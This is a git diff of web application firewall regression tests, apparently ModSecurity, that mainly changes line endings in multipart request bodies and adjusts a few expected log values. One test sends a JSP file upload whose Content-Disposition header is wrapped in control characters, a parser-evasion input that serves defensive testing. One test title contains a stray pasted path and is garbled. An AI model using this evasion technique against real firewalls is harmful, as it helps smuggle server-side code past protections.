"----ea520cef1a2937d8e928e357992c8fdd\r\n", + "Content-Transfer-Encoding: 7bit\r\n", + "Content-Type: text/plain; charset=US-ASCII;\r\n", + " format=flowed\r\n", + "\r\n", + "Test message, the txt file had been attached.\r\n", + "\r\n", + "--\r\n", + "Ervin\r\n", + "\r\n", + "\r\n", + "-------------------------------8842564605616207552020332273--\r\n" ] }, "response":{ @@ -2581,7 +2579,7 @@ { "enabled":1, "version_min":300000, - "title":"multipart parser (contains foreign bound., wrong lead bound., strict mode)", + "title":"multipart parser (ctest-cases/regression/request-body-parser-multipart.jsonontains foreign bound., wrong lead bound., strict mode)", "client":{ "ip":"200.249.12.31", "port":123 @@ -2602,26 +2600,26 @@ "uri":"/", "method":"POST", "body":[ - "-------------------------------8842564605616207552020332274\r", - "Content-Disposition: form-data; name=\"_token\"\r", - "\r", - "9e433de44c9e9b4ce19603269aa34edb\r", - "-------------------------------8842564605616207552020332273\r", - "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "----ea520cef1a2937d8e928e357992c8fdd\r", - "Content-Transfer-Encoding: 7bit\r", - "Content-Type: text/plain; charset=US-ASCII;\r", - " format=flowed\r", - "\r", - "Test message, the txt file had been attached.\r", - "\r", - "--\r", - "Ervin\r", - "\r", - "\r", - "-------------------------------8842564605616207552020332273--\r" + "-------------------------------8842564605616207552020332274\r\n", + "Content-Disposition: form-data; name=\"_token\"\r\n", + "\r\n", + "9e433de44c9e9b4ce19603269aa34edb\r\n", + "-------------------------------8842564605616207552020332273\r\n", + "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "----ea520cef1a2937d8e928e357992c8fdd\r\n", + "Content-Transfer-Encoding: 7bit\r\n", + "Content-Type: text/plain; charset=US-ASCII;\r\n", + " format=flowed\r\n", + "\r\n", + "Test message, the txt file had been attached.\r\n", + "\r\n", + "--\r\n", + "Ervin\r\n", + "\r\n", + "\r\n", + "-------------------------------8842564605616207552020332273--\r\n" ] }, "response":{ @@ -2667,26 +2665,26 @@ "uri":"/", "method":"POST", "body":[ - "-------------------------------8842564605616207552020332273\r", - "Content-Disposition: form-data; name=\"_token\"\r", - "\r", - "9e433de44c9e9b4ce19603269aa34edb\r", - "-------------------------------8842564605616207552020332274\r", - "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "----ea520cef1a2937d8e928e357992c8fdd\r", - "Content-Transfer-Encoding: 7bit\r", - "Content-Type: text/plain; charset=US-ASCII;\r", - " format=flowed\r", - "\r", - "Test message, the txt file had been attached.\r", - "\r", - "--\r", - "Ervin\r", - "\r", - "\r", - "-------------------------------8842564605616207552020332273--\r" + "-------------------------------8842564605616207552020332273\r\n", + "Content-Disposition: form-data; name=\"_token\"\r\n", + "\r\n", + "9e433de44c9e9b4ce19603269aa34edb\r\n", + "-------------------------------8842564605616207552020332274\r\n", + "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "----ea520cef1a2937d8e928e357992c8fdd\r\n", + "Content-Transfer-Encoding: 7bit\r\n", + "Content-Type: text/plain; charset=US-ASCII;\r\n", + " format=flowed\r\n", + "\r\n", + "Test message, the txt file had been attached.\r\n", + "\r\n", + "--\r\n", + "Ervin\r\n", + "\r\n", + "\r\n", + "-------------------------------8842564605616207552020332273--\r\n" ] }, "response":{ @@ -2732,26 +2730,26 @@ "uri":"/", "method":"POST", "body":[ - "-------------------------------8842564605616207552020332273\r", - "Content-Disposition: form-data; name=\"_token\"\r", - "\r", - "9e433de44c9e9b4ce19603269aa34edb\r", - "-------------------------------8842564605616207552020332273\r", - "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "----ea520cef1a2937d8e928e357992c8fdd\r", - "Content-Transfer-Encoding: 7bit\r", - "Content-Type: text/plain; charset=US-ASCII;\r", - " format=flowed\r", - "\r", - "Test message, the txt file had been attached.\r", - "\r", - "--\r", - "Ervin\r", - "\r", - "\r", - "-------------------------------8842564605616207552020332274--\r" + "-------------------------------8842564605616207552020332273\r\n", + "Content-Disposition: form-data; name=\"_token\"\r\n", + "\r\n", + "9e433de44c9e9b4ce19603269aa34edb\r\n", + "-------------------------------8842564605616207552020332273\r\n", + "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "----ea520cef1a2937d8e928e357992c8fdd\r\n", + "Content-Transfer-Encoding: 7bit\r\n", + "Content-Type: text/plain; charset=US-ASCII;\r\n", + " format=flowed\r\n", + "\r\n", + "Test message, the txt file had been attached.\r\n", + "\r\n", + "--\r\n", + "Ervin\r\n", + "\r\n", + "\r\n", + "-------------------------------8842564605616207552020332274--\r\n" ] }, "response":{ @@ -2797,22 +2795,22 @@ "uri":"/", "method":"POST", "body":[ - "-------------------------------8842564605616207552020332274\r", - "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "----ea520cef1a2937d8e928e357992c8fdd\r", - "Content-Transfer-Encoding: 7bit\r", - "Content-Type: text/plain; charset=US-ASCII;\r", - " format=flowed\r", - "\r", - "Test message, the txt file had been attached.\r", - "\r", - "--\r", - "Ervin\r", - "\r", - "\r", - "-------------------------------8842564605616207552020332273--\r" + "-------------------------------8842564605616207552020332274\r\n", + "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "----ea520cef1a2937d8e928e357992c8fdd\r\n", + "Content-Transfer-Encoding: 7bit\r\n", + "Content-Type: text/plain; charset=US-ASCII;\r\n", + " format=flowed\r\n", + "\r\n", + "Test message, the txt file had been attached.\r\n", + "\r\n", + "--\r\n", + "Ervin\r\n", + "\r\n", + "\r\n", + "-------------------------------8842564605616207552020332273--\r\n" ] }, "response":{ @@ -2858,22 +2856,22 @@ "uri":"/", "method":"POST", "body":[ - "-------------------------------8842564605616207552020332273\r", - "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "----ea520cef1a2937d8e928e357992c8fdd\r", - "Content-Transfer-Encoding: 7bit\r", - "Content-Type: text/plain; charset=US-ASCII;\r", - " format=flowed\r", - "\r", - "Test message, the txt file had been attached.\r", - "\r", - "--\r", - "Ervin\r", - "\r", - "\r", - "-------------------------------8842564605616207552020332274--\r" + "-------------------------------8842564605616207552020332273\r\n", + "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "----ea520cef1a2937d8e928e357992c8fdd\r\n", + "Content-Transfer-Encoding: 7bit\r\n", + "Content-Type: text/plain; charset=US-ASCII;\r\n", + " format=flowed\r\n", + "\r\n", + "Test message, the txt file had been attached.\r\n", + "\r\n", + "--\r\n", + "Ervin\r\n", + "\r\n", + "\r\n", + "-------------------------------8842564605616207552020332274--\r\n" ] }, "response":{ @@ -2919,36 +2917,36 @@ "uri":"/", "method":"POST", "body":[ - "-----------------------------3163850615828140691827348175\r", - "Content-Disposition: form-data; name=\"_token\"\r", - "\r", - "3eeb646795ba8db63b05ba77df2a0b2c\r", - "-----------------------------3163850615828140691827348175\r", - "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"multipart_text.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "Content-Type: multipart/alternative; boundary=\"00000000000041382f056d9314e6\"\r", - "\r", - "--00000000000041382f056d9314e6\r", - "Content-Type: text/plain; charset=\"UTF-8\"\r", - "Content-Transfer-Encoding: quoted-printable\r", - "\r", - "Hi,\r", - "\r", - "...\r", - "\r", - "--00000000000041382f056d9314e6\r", - "Content-Type: text/html; charset=\"UTF-8\"\r", - "Content-Transfer-Encoding: quoted-printable\r", - "\r", - "
\r", - "...\r", - "
\r", - "\r", - "--00000000000041382f056d9314e6--\r", - "\r", - "\r", - "-----------------------------3163850615828140691827348175--\r" + "-----------------------------3163850615828140691827348175\r\n", + "Content-Disposition: form-data; name=\"_token\"\r\n", + "\r\n", + "3eeb646795ba8db63b05ba77df2a0b2c\r\n", + "-----------------------------3163850615828140691827348175\r\n", + "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"multipart_text.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "Content-Type: multipart/alternative; boundary=\"00000000000041382f056d9314e6\"\r\n", + "\r\n", + "--00000000000041382f056d9314e6\r\n", + "Content-Type: text/plain; charset=\"UTF-8\"\r\n", + "Content-Transfer-Encoding: quoted-printable\r\n", + "\r\n", + "Hi,\r\n", + "\r\n", + "...\r\n", + "\r\n", + "--00000000000041382f056d9314e6\r\n", + "Content-Type: text/html; charset=\"UTF-8\"\r\n", + "Content-Transfer-Encoding: quoted-printable\r\n", + "\r\n", + "
\r\n", + "...\r\n", + "
\r\n", + "\r\n", + "--00000000000041382f056d9314e6--\r\n", + "\r\n", + "\r\n", + "-----------------------------3163850615828140691827348175--\r\n" ] }, "response":{ @@ -3264,15 +3262,15 @@ "uri":"/", "method":"POST", "body":[ - "--00000000\r", - "Content-Disposition: form-data; name=\"namea\"\r", - "\r", - "111\r", - "--00000000\r", - "Content-Disposition: form-data; name=\"nameb\"\r", - "\r", - "222\r", - "--00000000--\r" + "--00000000\r\n", + "Content-Disposition: form-data; name=\"namea\"\r\n", + "\r\n", + "111\r\n", + "--00000000\r\n", + "Content-Disposition: form-data; name=\"nameb\"\r\n", + "\r\n", + "222\r\n", + "--00000000--\r\n" ] }, "response":{ @@ -3319,12 +3317,12 @@ "uri":"/", "method":"POST", "body":[ - "--a\r", - "\u000eContent-Disposition\u000e: form-data; name=\"file\"; filename=\"1.jsp\"\r", - "Content-Disposition: form-data; name=\"post\";\r", - "\r", - "<%out.print(123)%>\r", - "--a--\r" + "--a\r\n", + "\u000eContent-Disposition\u000e: form-data; name=\"file\"; filename=\"1.jsp\"\r\n", + "Content-Disposition: form-data; name=\"post\";\r\n", + "\r\n", + "<%out.print(123)%>\r\n", + "--a--\r\n" ] }, "response":{ @@ -3346,4 +3344,4 @@ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"" ] } -] +] diff --git a/test/test-cases/regression/rule-920120.json b/test/test-cases/regression/rule-920120.json index cdc437074f..7a3ec93881 100644 --- a/test/test-cases/regression/rule-920120.json +++ b/test/test-cases/regression/rule-920120.json @@ -25,21 +25,21 @@ "uri":"/", "method":"POST", "body": [ - "-----------------------------265001916915724\r", - "Content-Disposition: form-data; name=\"fi;le\"; filename=\"test\"\r", - "Content-Type: application/octet-stream\r", - "\r", - "Rotem & Ayala\r", - "\r", - "-----------------------------265001916915724\r", - "Content-Disposition: form-data; name=\"name\"\r", - "\r", - "tt2\r", - "-----------------------------265001916915724\r", - "Content-Disposition: form-data; name=\"B1\"\r", - "\r", - "Submit\r", - "-----------------------------265001916915724--\r" + "-----------------------------265001916915724\r\n", + "Content-Disposition: form-data; name=\"fi;le\"; filename=\"test\"\r\n", + "Content-Type: application/octet-stream\r\n", + "\r\n", + "Rotem & Ayala\r\n", + "\r\n", + "-----------------------------265001916915724\r\n", + "Content-Disposition: form-data; name=\"name\"\r\n", + "\r\n", + "tt2\r\n", + "-----------------------------265001916915724\r\n", + "Content-Disposition: form-data; name=\"B1\"\r\n", + "\r\n", + "Submit\r\n", + "-----------------------------265001916915724--\r\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-ARGS_COMBINED_SIZE.json b/test/test-cases/regression/variable-ARGS_COMBINED_SIZE.json index 034005acea..77f06c515d 100644 --- a/test/test-cases/regression/variable-ARGS_COMBINED_SIZE.json +++ b/test/test-cases/regression/variable-ARGS_COMBINED_SIZE.json @@ -114,7 +114,7 @@ ] }, "expected":{ - "debug_log":"Target value: \"25." + "debug_log":"Target value: \"24." }, "rules":[ "SecRuleEngine On", @@ -158,7 +158,7 @@ ] }, "expected":{ - "debug_log":"Target value: \"28." + "debug_log":"Target value: \"27." }, "rules":[ "SecRuleEngine On", @@ -202,7 +202,7 @@ ] }, "expected":{ - "debug_log":"Target value: \"16." + "debug_log":"Target value: \"15." }, "rules":[ "SecRuleEngine On", diff --git a/test/test-cases/regression/variable-ARGS_NAMES.json b/test/test-cases/regression/variable-ARGS_NAMES.json index bf3e80d427..fe4445e702 100644 --- a/test/test-cases/regression/variable-ARGS_NAMES.json +++ b/test/test-cases/regression/variable-ARGS_NAMES.json @@ -189,15 +189,15 @@ "uri":"/", "method":"POST", "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name1\"\r", - "\r", - "content1\r", - "--0000\r", - "Content-Disposition: form-data; name=\"name2\"\r", - "\r", - "content2\r", - "--0000--\r" + "--0000\r\n", + "Content-Disposition: form-data; name=\"name1\"\r\n", + "\r\n", + "content1\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"name2\"\r\n", + "\r\n", + "content2\r\n", + "--0000--\r\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-ARGS_POST_NAMES.json b/test/test-cases/regression/variable-ARGS_POST_NAMES.json index e414c8763b..c25a93c038 100644 --- a/test/test-cases/regression/variable-ARGS_POST_NAMES.json +++ b/test/test-cases/regression/variable-ARGS_POST_NAMES.json @@ -111,15 +111,15 @@ "uri":"/", "method":"POST", "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name1\"\r", - "\r", - "content1\r", - "--0000\r", - "Content-Disposition: form-data; name=\"name2\"\r", - "\r", - "content2\r", - "--0000--\r" + "--0000\r\n", + "Content-Disposition: form-data; name=\"name1\"\r\n", + "\r\n", + "content1\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"name2\"\r\n", + "\r\n", + "content2\r\n", + "--0000--\r\n" ] }, "response":{ @@ -163,15 +163,15 @@ "uri":"/", "method":"POST", "body":[ - "--0000\r", - "Content-Disposition: form-data; name=\"name1\"\r", - "\r", - "content1\r", - "--0000\r", - "Content-Disposition: form-data; name=\"name2\"\r", - "\r", - "content2\r", - "--0000--\r" + "--0000\r\n", + "Content-Disposition: form-data; name=\"name1\"\r\n", + "\r\n", + "content1\r\n", + "--0000\r\n", + "Content-Disposition: form-data; name=\"name2\"\r\n", + "\r\n", + "content2\r\n", + "--0000--\r\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-FILES.json b/test/test-cases/regression/variable-FILES.json index 7f0f4dcf56..493cb4d352 100644 --- a/test/test-cases/regression/variable-FILES.json +++ b/test/test-cases/regression/variable-FILES.json @@ -23,21 +23,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ @@ -82,21 +82,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata1\"; filename=\"myfile.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata2\"; filename=\"nextfile.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata1\"; filename=\"myfile.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata2\"; filename=\"nextfile.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-FILES_COMBINED_SIZE.json b/test/test-cases/regression/variable-FILES_COMBINED_SIZE.json index 23a1c027ee..961d14e534 100644 --- a/test/test-cases/regression/variable-FILES_COMBINED_SIZE.json +++ b/test/test-cases/regression/variable-FILES_COMBINED_SIZE.json @@ -23,21 +23,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-FILES_NAMES.json b/test/test-cases/regression/variable-FILES_NAMES.json index fcf95ed972..0e35fdc611 100644 --- a/test/test-cases/regression/variable-FILES_NAMES.json +++ b/test/test-cases/regression/variable-FILES_NAMES.json @@ -23,21 +23,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-FILES_SIZES.json b/test/test-cases/regression/variable-FILES_SIZES.json index fa8a3525c7..9c1228a3cd 100644 --- a/test/test-cases/regression/variable-FILES_SIZES.json +++ b/test/test-cases/regression/variable-FILES_SIZES.json @@ -23,21 +23,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-FULL_REQUEST_LENGTH.json b/test/test-cases/regression/variable-FULL_REQUEST_LENGTH.json index dd9d0292d3..d7c4b98db7 100644 --- a/test/test-cases/regression/variable-FULL_REQUEST_LENGTH.json +++ b/test/test-cases/regression/variable-FULL_REQUEST_LENGTH.json @@ -23,21 +23,21 @@ "uri":"/", "method":"POST", "body":[ - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "--------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "--------------------------756b6d74fa1a8ee2--" + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "--------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "--------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json b/test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json index 2142729992..95e8bd4eb9 100644 --- a/test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json +++ b/test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json @@ -23,21 +23,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ @@ -82,21 +82,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "This is another very small test file..\r", - "----------------------------756b6d74fa1a8ee2--\r" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "This is another very small test file..\r\n", + "----------------------------756b6d74fa1a8ee2--\r\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-MULTIPART_FILENAME.json b/test/test-cases/regression/variable-MULTIPART_FILENAME.json index 1c54736ac2..1e83a7d849 100644 --- a/test/test-cases/regression/variable-MULTIPART_FILENAME.json +++ b/test/test-cases/regression/variable-MULTIPART_FILENAME.json @@ -23,21 +23,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ @@ -51,7 +51,7 @@ ] }, "expected":{ - "debug_log":"Target value: \"small_text_file.txt\" \\(Variable: MULTIPART_FILENAME" + "debug_log":"Target value: \"small_text_file.txt\" \\(Variable: MULTIPART_FILENAME" }, "rules":[ "SecRuleEngine On", @@ -82,21 +82,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"\r", - "Content-Type: text/plain\r", - "\r", - "This is another very small test file..\r", - "----------------------------756b6d74fa1a8ee2--\r" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "This is another very small test file..\r\n", + "----------------------------756b6d74fa1a8ee2--\r\n" ] }, "response":{ @@ -110,7 +110,7 @@ ] }, "expected":{ - "debug_log":"Target value: \"small_text_file2.txt\" \\(Variable: MULTIPART_FILENAME" + "debug_log":"Target value: \"small_text_file2.txt\" \\(Variable: MULTIPART_FILENAME" }, "rules":[ "SecRuleEngine On", diff --git a/test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json b/test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json index b9e14f98b3..dd196a41cb 100644 --- a/test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json +++ b/test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json @@ -23,17 +23,17 @@ "uri":"/", "method":"POST", "body":[ - "-------------------------------69343412719991675451336310646", - "Content-Disposition: form-data;", - " name=\"a\"", - "", - "1", - "-------------------------------69343412719991675451336310646", - "Content-Disposition: form-data;", - " name=\"b\"", - "", - "2", - "-------------------------------69343412719991675451336310646--" + "-------------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data;\n", + " name=\"a\"\n", + "\n", + "1\n", + "-------------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data;\n", + " name=\"b\"\n", + "\n", + "2\n", + "-------------------------------69343412719991675451336310646--\n" ] }, "response":{ diff --git a/test/test-cases/regression/variable-MULTIPART_NAME.json b/test/test-cases/regression/variable-MULTIPART_NAME.json index c4ee2b0c57..63e5f629e1 100644 --- a/test/test-cases/regression/variable-MULTIPART_NAME.json +++ b/test/test-cases/regression/variable-MULTIPART_NAME.json @@ -23,21 +23,21 @@ 